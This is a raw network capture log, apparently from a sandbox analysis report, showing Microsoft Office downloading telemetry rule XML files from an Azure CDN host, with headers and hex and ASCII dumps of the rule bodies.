                                                                                                                                                                                                                                                                                                    2024-12-04 01:00:33 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                    Date: Wed, 04 Dec 2024 01:00:33 GMT
                                                                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                                                                    Content-Length: 427
                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:26:31 GMT
                                                                                                                                                                                                                                                                                                    ETag: "0x8DC582BB464F255"
                                                                                                                                                                                                                                                                                                    x-ms-request-id: 8aad1780-e01e-0020-7ed6-43de90000000
                                                                                                                                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                    x-azure-ref: 20241204T010033Z-174f7845968px8v7hC1EWR08ng000000170g000000006w8t
                                                                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                    2024-12-04 01:00:33 UTC427INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 54 74 5d 5b 48 68 5d 5b 49 69 5d 5b 4e 6e 5d 5b 50 70 5d 5b 55 75 5d 5b 54 74 5d 5b 45 65 5d 5b 52 72 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20
                                                                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120673" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120671" /> <SR T="2" R="([Tt][Hh][Ii][Nn][Pp][Uu][Tt][Ee][Rr])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                    72192.168.2.64977813.107.246.63443
                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                    2024-12-04 01:00:33 UTC192OUTGET /rules/rule120675v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                    2024-12-04 01:00:34 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                    Date: Wed, 04 Dec 2024 01:00:33 GMT
                                                                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                                                                    Content-Length: 419
                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:26:08 GMT
                                                                                                                                                                                                                                                                                                    ETag: "0x8DC582BA6CF78C8"
                                                                                                                                                                                                                                                                                                    x-ms-request-id: 4f79ec39-601e-0070-0891-3fa0c9000000
                                                                                                                                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                    x-azure-ref: 20241204T010033Z-174f78459684bddphC1EWRbht400000016d000000000f89c
                                                                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                    2024-12-04 01:00:34 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 55 75 5d 5b 50 70 5d 5b 43 63 5d 5b 4c 6c 5d 5b 4f 6f 5d 5b 55 75 5d 5b 44 64 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120675" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120673" /> <SR T="2" R="([Uu][Pp][Cc][Ll][Oo][Uu][Dd])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                    73192.168.2.64977913.107.246.63443
                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                    2024-12-04 01:00:33 UTC192OUTGET /rules/rule120676v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                    2024-12-04 01:00:34 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                    Date: Wed, 04 Dec 2024 01:00:33 GMT
                                                                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                                                                    Content-Length: 472
                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                                                                                                                                                                                                                                                                                                    ETag: "0x8DC582B984BF177"
                                                                                                                                                                                                                                                                                                    x-ms-request-id: 72953a3b-301e-0000-41cd-45eecc000000
                                                                                                                                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                    x-azure-ref: 20241204T010033Z-1746fd949bdjrnwqhC1EWRpg2800000000m00000000049tp
                                                                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                    2024-12-04 01:00:34 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120676" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120675" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                    74192.168.2.64978013.107.246.63443
                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                    2024-12-04 01:00:33 UTC192OUTGET /rules/rule120677v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                    2024-12-04 01:00:34 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                    Date: Wed, 04 Dec 2024 01:00:34 GMT
                                                                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                                                                    Content-Length: 405
                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:25:37 GMT
                                                                                                                                                                                                                                                                                                    ETag: "0x8DC582B942B6AFF"
                                                                                                                                                                                                                                                                                                    x-ms-request-id: 92011275-e01e-0033-54c3-454695000000
                                                                                                                                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                    x-azure-ref: 20241204T010034Z-1746fd949bd77mkmhC1EWR5efc00000000sg000000009zdv
                                                                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                    2024-12-04 01:00:34 UTC405INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5e 5b 58 78 5d 5b 45 65 5d 5b 4e 6e 5d 24 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c
                                                                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120677" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120675" /> <SR T="2" R="(^[Xx][Ee][Nn]$)"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <


                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                    75192.168.2.64978113.107.246.63443
                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                    2024-12-04 01:00:34 UTC192OUTGET /rules/rule120678v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                    2024-12-04 01:00:35 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                    Date: Wed, 04 Dec 2024 01:00:35 GMT
                                                                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                                                                    Content-Length: 468
                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:26:41 GMT
                                                                                                                                                                                                                                                                                                    ETag: "0x8DC582BBA642BF4"
                                                                                                                                                                                                                                                                                                    x-ms-request-id: 626f2b07-401e-0015-15d1-450e8d000000
                                                                                                                                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                    x-azure-ref: 20241204T010035Z-1746fd949bd7wvgbhC1EWR0rgs00000000n0000000002mpc
                                                                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                    2024-12-04 01:00:35 UTC468INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120678" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120677" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                    76192.168.2.64978213.107.246.63443
                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                    2024-12-04 01:00:35 UTC192OUTGET /rules/rule120679v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                    2024-12-04 01:00:35 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                    Date: Wed, 04 Dec 2024 01:00:35 GMT
                                                                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                                                                    Content-Length: 174
                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:25:33 GMT
                                                                                                                                                                                                                                                                                                    ETag: "0x8DC582B91D80E15"
                                                                                                                                                                                                                                                                                                    x-ms-request-id: 357a15c2-f01e-001f-47c7-435dc8000000
                                                                                                                                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                    x-azure-ref: 20241204T010035Z-174f7845968ljs8phC1EWRe6en00000016g000000000knt1
                                                                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                    2024-12-04 01:00:35 UTC174INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 37 22 20 2f 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 54 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 31 22 20 2f 3e 0d 0a 20 20 3c 2f 54 3e 0d 0a 3c 2f 52 3e
                                                                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120679" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120677" /> </S> <T> <S T="1" /> </T></R>


                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                    77192.168.2.64978413.107.246.63443
                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                    2024-12-04 01:00:36 UTC192OUTGET /rules/rule120682v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                    2024-12-04 01:00:36 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                    Date: Wed, 04 Dec 2024 01:00:36 GMT
                                                                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                                                                    Content-Length: 501
                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:26:18 GMT
                                                                                                                                                                                                                                                                                                    ETag: "0x8DC582BACFDAACD"
                                                                                                                                                                                                                                                                                                    x-ms-request-id: d1823508-801e-008c-16d3-457130000000
                                                                                                                                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                    x-azure-ref: 20241204T010036Z-1746fd949bdjzh7thC1EWR3g6400000000d000000000162f
                                                                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                    2024-12-04 01:00:36 UTC501INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 38 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 41 20 54 3d 22 31 22 20 45 3d 22 54 65 6c 65 6d 65 74 72 79 53 74 61 72 74 75 70 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 32 22 20 52 3d 22 31 32 30 31 30 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 53 20 54 3d 22 33 22 20 47 3d 22 7b 62 31 36 37 36 61 63 33 2d 37 66 65 65 2d 34 34 61 39 2d 39 61 30 65 2d 64 62 62 30 62 34 39 36 65 66 61 35 7d 22 20 2f 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22
                                                                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120682" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <A T="1" E="TelemetryStartup" /> <R T="2" R="120100" /> <SS T="3" G="{b1676ac3-7fee-44a9-9a0e-dbb0b496efa5}" /> </S> <C T="


                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                    78192.168.2.64978313.107.246.63443
                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                    2024-12-04 01:00:36 UTC192OUTGET /rules/rule120680v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                    2024-12-04 01:00:36 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                    Date: Wed, 04 Dec 2024 01:00:36 GMT
                                                                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                                                                    Content-Length: 1952
                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:25:39 GMT
                                                                                                                                                                                                                                                                                                    ETag: "0x8DC582B956B0F3D"
                                                                                                                                                                                                                                                                                                    x-ms-request-id: fdde7aaa-d01e-0028-2a8c-3f7896000000
                                                                                                                                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                    x-azure-ref: 20241204T010036Z-174f7845968jrjrxhC1EWRmmrs00000016tg00000000fksk
                                                                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                    2024-12-04 01:00:36 UTC1952INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 38 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 53 53 20 54 3d 22 31 22 20 47 3d 22 7b 62 31 36 37 36 61 63 33 2d 37 66 65 65 2d 34 34 61 39 2d 39 61 30 65 2d 64 62 62 30 62 34 39 36 65 66 61 35 7d 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 32 22 20 52 3d 22 31 32 30 36 38 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 33 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 4c 54 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120680" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <SS T="1" G="{b1676ac3-7fee-44a9-9a0e-dbb0b496efa5}" /> <R T="2" R="120682" /> <F T="3"> <O T="LT"> <L>


                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                    79192.168.2.64978513.107.246.63443
                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                    2024-12-04 01:00:36 UTC192OUTGET /rules/rule120681v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                    2024-12-04 01:00:36 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                    Date: Wed, 04 Dec 2024 01:00:36 GMT
                                                                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                                                                    Content-Length: 958
                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:25:58 GMT
                                                                                                                                                                                                                                                                                                    ETag: "0x8DC582BA0A31B3B"
                                                                                                                                                                                                                                                                                                    x-ms-request-id: 4927bbd2-c01e-000b-53cc-45e255000000
                                                                                                                                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                    x-azure-ref: 20241204T010036Z-174f7845968j6t2phC1EWRcfe800000016z0000000001dyx
                                                                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                    2024-12-04 01:00:36 UTC958INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 38 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 38 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 32 22 20 52 3d 22 31 32 30 36 38 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 33 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 41 4e 44 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a
                                                                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120681" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <R T="1" R="120608" /> <R T="2" R="120680" /> <TH T="3"> <O T="AND"> <L> <O T="EQ"> <L>


                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                    80192.168.2.64978613.107.246.63443
                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                    2024-12-04 01:00:37 UTC193OUTGET /rules/rule120602v10s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip
